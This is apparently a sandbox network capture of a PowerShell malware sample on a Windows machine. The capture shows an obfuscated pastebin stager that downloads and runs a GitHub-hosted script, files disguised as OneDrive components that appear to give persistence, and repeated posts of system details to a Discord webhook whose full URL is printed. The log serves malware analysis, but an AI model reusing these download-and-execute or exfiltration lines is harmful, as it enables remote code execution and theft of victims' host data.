                                                                2024-10-15 14:00:14 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                2024-10-15 14:00:14 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 52050 | 162.159.128.233 | 443 | 7352 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:28 UTC | 311 | OUT
POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Content-Type: application/json
Host: discord.com
Content-Length: 302
Connection: Keep-Alive
2024-10-15 14:00:28 UTC | 302 | OUT
Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** AG11AP66\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UA
2024-10-15 14:00:28 UTC | 1261 | IN
HTTP/1.1 404 Not Found
Date: Tue, 15 Oct 2024 14:00:28 GMT
Content-Type: application/json
Content-Length: 45
Connection: close
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1729000830
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKHpiolfSBMOmhMVHMCKAAGkZ4L%2F6xtf%2FVEDsRBGlsW1e3%2Bnbj6rsjP5fip6jl%2BVRZLSXNeuydXw5a5zIi2A%2Fm4kMuUdiHesM2Z0v802QXta%2BC2YBtzrGoGQ7tKZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Set-Cookie: __cfruid=48444a3424e72dbda7b42e0414b3a7ec1da5158a-1729000828; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: _cfuvid=.tK.8_bM.IlqYQCskpMyBWYMJqLfcyu08rolf4Vi0ak-1729000828721-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d3055eabfe8463e-DFW
2024-10-15 14:00:28 UTC | 45 | IN
Data Ascii: {"message": "Unknown Webhook", "code": 10015}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 52049 | 162.159.128.233 | 443 | 6448 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:28 UTC | 311 | OUT
POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Content-Type: application/json
Host: discord.com
Content-Length: 302
Connection: Keep-Alive
2024-10-15 14:00:28 UTC | 302 | OUT
Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** AG11AP66\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UA
2024-10-15 14:00:28 UTC | 1261 | IN
HTTP/1.1 404 Not Found
Date: Tue, 15 Oct 2024 14:00:28 GMT
Content-Type: application/json
Content-Length: 45
Connection: close
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1729000830
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eWkylGAmxKzDKJkj%2B7wLOdgBOts%2FMJuy3G3m0RU5XfXU4S9YAVZewPD4icofBcQK3HU9Py%2BRuuGsRw71Z5d%2F1Giz%2B1y4cNwI13zAbbcx4Svg84Tzzoax%2FDCGxOc3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Set-Cookie: __cfruid=48444a3424e72dbda7b42e0414b3a7ec1da5158a-1729000828; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: _cfuvid=xSJuK64XEUQZUWANV0z1KgUnC_eADyp7hPkdEdtJkUU-1729000828724-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d3055ead8443ad3-DFW
2024-10-15 14:00:28 UTC | 45 | IN
Data Ascii: {"message": "Unknown Webhook", "code": 10015}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 52102 | 162.159.128.233 | 443 | 7172 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:38 UTC | 311 | OUT
POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Content-Type: application/json
Host: discord.com
Content-Length: 302
Connection: Keep-Alive
2024-10-15 14:00:38 UTC | 302 | OUT
Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** AG11AP66\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UA
2024-10-15 14:00:38 UTC | 1261 | IN
HTTP/1.1 404 Not Found
Date: Tue, 15 Oct 2024 14:00:38 GMT
Content-Type: application/json
Content-Length: 45
Connection: close
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1729000840
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cub%2FLRgLACco1CFNH9Q9AmckyywIt1%2BhfywRakNHRkEM%2Fk0UUVj7%2FB2NAytGN8ysw45uQ2cj0fepkrPy2yqV6AH0tjs9XplDLW62cRmyc3%2B5gvEA87fU%2FqhQFlEK"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Set-Cookie: __cfruid=91e6537d835960c5dea5f6c908574570d8411595-1729000838; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: _cfuvid=XRs7R23fkRnrXQRBTIVDR3Mx4Pp6hStSK7yD5KtZGmE-1729000838909-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d30562a7e982e66-DFW
2024-10-15 14:00:38 UTC | 45 | IN
Data Ascii: {"message": "Unknown Webhook", "code": 10015}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 52104 | 162.159.128.233 | 443 | 7180 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:38 UTC | 311 | OUT
POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Content-Type: application/json
Host: discord.com
Content-Length: 302
Connection: Keep-Alive
2024-10-15 14:00:38 UTC | 302 | OUT
Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** AG11AP66\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UA
2024-10-15 14:00:39 UTC | 1253 | IN
HTTP/1.1 404 Not Found
Date: Tue, 15 Oct 2024 14:00:38 GMT
Content-Type: application/json
Content-Length: 45
Connection: close
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1729000840
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZqdOiyxqP9WV6kqIVh%2B5GCuOIqE00aCHn6eB40YB1BB9geKJipNhOdqwNJ2v6snbPVw1QCRaxAyACQI3aiUlPKUb5FN82%2FE91IyQ0mMwPxd4u4YjfM9OBY4SVQRZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Set-Cookie: __cfruid=91e6537d835960c5dea5f6c908574570d8411595-1729000838; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: _cfuvid=yEOotwkWt1dVal8F_cF0I.SDW0zDBw1WL7y6Ggktvek-1729000838959-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d30562adb78e76a-DFW
2024-10-15 14:00:39 UTC | 45 | IN
Data Ascii: {"message": "Unknown Webhook", "code": 10015}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 52114 | 104.20.3.235 | 443 | 5844 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:40 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: pastebin.com
    Connection: Keep-Alive
2024-10-15 14:00:41 UTC | 397 | IN | HTTP/1.1 200 OK
    Date: Tue, 15 Oct 2024 14:00:41 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: HIT
    Age: 491
    Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
    Server: cloudflare
    CF-RAY: 8d305638ae10ddb0-DFW
2024-10-15 14:00:41 UTC | 139 | IN | Data Ascii:
    85
    calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
2024-10-15 14:00:41 UTC | 5 | IN | Data Ascii:
    0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 52125 | 185.199.109.133 | 443 | 5844 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:42 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
2024-10-15 14:00:42 UTC | 901 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 7508
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
    Accept-Ranges: bytes
    Date: Tue, 15 Oct 2024 14:00:42 GMT
    Via: 1.1 varnish
    X-Served-By: cache-dfw-kdal2120101-DFW
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1729000842.475392,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: b938ed4570071f8a2456399d468e69a4a3ce2f92
    Expires: Tue, 15 Oct 2024 14:05:42 GMT
    Source-Age: 48
2024-10-15 14:00:42 UTC | 1378 | IN | Data Ascii:
    sleep 5
    rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Force
    sleep 5
    
    
    $googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
    if (-Not (Test-Path $googoogaagaa)) {
    rm $env:tmp\onedrivefilesync.dll -force
    New-ItemPropert
2024-10-15 14:00:42 UTC | 1378 | IN | Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
2024-10-15 14:00:42 UTC | 1378 | IN | Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
2024-10-15 14:00:42 UTC | 1378 | IN | Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
2024-10-15 14:00:42 UTC | 1378 | IN | Data Ascii:
    cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors
    
    # Retrieve GPU information
    $gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
2024-10-15 14:00:42 UTC | 618 | IN | Data Ascii:
    ======================
    "@
    } | ConvertTo-Json
    
    # Send the POST request to the webhook URL
    try {
        Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
        Write-Output "Message sent successfully."
    } catch {
        W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 52155 | 104.20.3.235 | 443 | 4240 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:48 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: pastebin.com
    Connection: Keep-Alive
2024-10-15 14:00:48 UTC | 397 | IN | HTTP/1.1 200 OK
    Date: Tue, 15 Oct 2024 14:00:48 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: HIT
    Age: 498
    Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
    Server: cloudflare
    CF-RAY: 8d3056677bc8e81f-DFW
2024-10-15 14:00:48 UTC | 139 | IN | Data Ascii:
    85
    calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
2024-10-15 14:00:48 UTC | 5 | IN | Data Ascii:
    0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 52167 | 185.199.109.133 | 443 | 4240 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:49 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
2024-10-15 14:00:50 UTC | 901 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 7508
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
    Accept-Ranges: bytes
    Date: Tue, 15 Oct 2024 14:00:50 GMT
    Via: 1.1 varnish
    X-Served-By: cache-dfw-kdfw8210135-DFW
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1729000850.011162,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: fa5cd381cd56296653d2b95f0aa292b0692fc59d
    Expires: Tue, 15 Oct 2024 14:05:50 GMT
    Source-Age: 55
2024-10-15 14:00:50 UTC | 1378 | IN | Data Ascii:
    sleep 5
    rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Force
    sleep 5
    
    
    $googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
    if (-Not (Test-Path $googoogaagaa)) {
    rm $env:tmp\onedrivefilesync.dll -force
    New-ItemPropert
2024-10-15 14:00:50 UTC | 1378 | IN | Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
2024-10-15 14:00:50 UTC | 1378 | IN | Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
2024-10-15 14:00:50 UTC | 1378 | IN | Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
2024-10-15 14:00:50 UTC | 1378 | IN | Data Ascii:
    cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors
    
    # Retrieve GPU information
    $gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
2024-10-15 14:00:50 UTC | 618 | IN | Data Ascii:
    ======================
    "@
    } | ConvertTo-Json
    
    # Send the POST request to the webhook URL
    try {
        Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
        Write-Output "Message sent successfully."
    } catch {
        W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 52203 | 162.159.128.233 | 443 | 5844 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
